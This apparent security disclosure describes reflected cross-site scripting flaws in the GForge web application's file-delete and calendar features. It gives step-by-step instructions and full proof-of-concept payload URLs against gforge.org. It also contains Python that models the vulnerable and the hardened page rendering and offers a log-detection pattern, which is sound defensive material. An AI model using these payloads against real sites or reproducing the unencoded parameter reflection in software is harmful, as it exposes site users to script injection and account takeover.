XSS in GForge App; Joomlacode.org, Stanford.edu, lbl.gov, etc. affected


A hacker known as "Sony" discovered a cross-site scripting (XSS) vulnerability in the GForge web application. GForge is a free-software fork of the web-based project-management and collaboration software originally created for SourceForge, called Savane. GForge provides project hosting, version control (CVS and Subversion), bug tracking, and messaging.

The hacker created two accounts for testing and found XSS in the files, calendar, message wall (search users) and blog features.


The Vulnerability Description:
XSS using Files:
After creating a test account, upload a file.

It will be available at this location:
http://gforge.org/gf/user/eleo/userfiles/

Press the Delete button, open the link in a new window, and append the XSS payload to the URL. The file_id parameter is reflected into the page without encoding.

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]

PoC:
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


XSS in Calendar:

Open the calendar, press the "add new event" button, then press Delete, open the link in a new window, and append the XSS payload to the URL. Here the start_date parameter is the one reflected without encoding.

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]

PoC:
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


The vulnerability affects the following sites: Joomlacode.org, Stanford.edu, lbl.gov, umich.edu, and other sites that use the GForge app.
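As an added illustration (not code from this post or from the GForge project, which is written in PHP), the following Python models the defect behind both PoCs above: a numeric request parameter such as file_id or start_date is reflected into the delete-confirmation page without validation or output encoding. It shows a minimal vulnerable render beside a hardened one (strict input validation plus html.escape on output), and a log-side check that decodes a request URL and names the parameters carrying script markers. The render functions, the marker regex and the decoded_params helper are assumptions for illustration only; the sample URL is the post's own files PoC, and the benign URL is constructed.

```python
from __future__ import annotations

import html
import re
from urllib.parse import unquote, urlsplit

# The post's own PoC URL (files vector), used here as sample input for the checks.
PAGE_POC_URL = (
    r"http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete"
    r"&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;"
    r"alert%28String.fromCharCode%2888,83,83%29%29//%22;"
    r"alert%28String.fromCharCode%2888,83,83%29%29//\%22;"
    r"alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E"
    r"%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E"
)

# Constructed benign request to the same endpoint.
BENIGN_URL = "http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089"


def decoded_params(url: str) -> dict[str, str]:
    """Split the query string on '&' only (the payload itself contains ';',
    so urllib's parse_qs would fragment it on older Pythons) and percent-decode
    each value twice so double-encoded attempts are also visible."""
    params: dict[str, str] = {}
    for pair in urlsplit(url).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[name] = unquote(unquote(value))
    return params


# Hypothetical model of the unsafe page: the parameter lands both in HTML text
# and inside an inline script literal, exactly the two contexts the PoC breaks out of.
def render_delete_confirm_vulnerable(file_id: str) -> str:
    return (f"<p>Delete file {file_id}?</p>"
            f"<script>var id='{file_id}';</script>")


# Hardened model: reject anything that is not a short decimal id, then encode on
# output anyway (defence in depth) and emit the script value as a number, never a string.
def render_delete_confirm_hardened(file_id: str) -> str:
    if not re.fullmatch(r"[0-9]{1,10}", file_id):
        raise ValueError("invalid file_id")
    safe = html.escape(file_id, quote=True)
    return (f"<p>Delete file {safe}?</p>"
            f"<script>var id={int(file_id)};</script>")


def hardened_rejects(file_id: str) -> bool:
    """True when the hardened renderer refuses the value (used by the check below)."""
    try:
        render_delete_confirm_hardened(file_id)
    except ValueError:
        return True
    return False


# Markers that should never appear in a decoded numeric id parameter. This is a
# triage heuristic for access logs, not a substitute for fixing the output encoding.
XSS_MARKERS = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=|String\.fromCharCode", re.I)


def flag_reflected_xss(url: str) -> list[str]:
    """Return the names of query parameters whose decoded value contains script markers."""
    return [name for name, value in decoded_params(url).items() if XSS_MARKERS.search(value)]


if __name__ == "__main__":
    print("flagged in PoC:", flag_reflected_xss(PAGE_POC_URL))
    print("flagged in benign:", flag_reflected_xss(BENIGN_URL))
    print("hardened output:", render_delete_confirm_hardened("3089"))
```

Running the check over a web server's access log is a matter of feeding each request line's URL to flag_reflected_xss; any hit on file_id, event_id or start_date against a GForge host is worth investigating, since those parameters should only ever carry integers.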
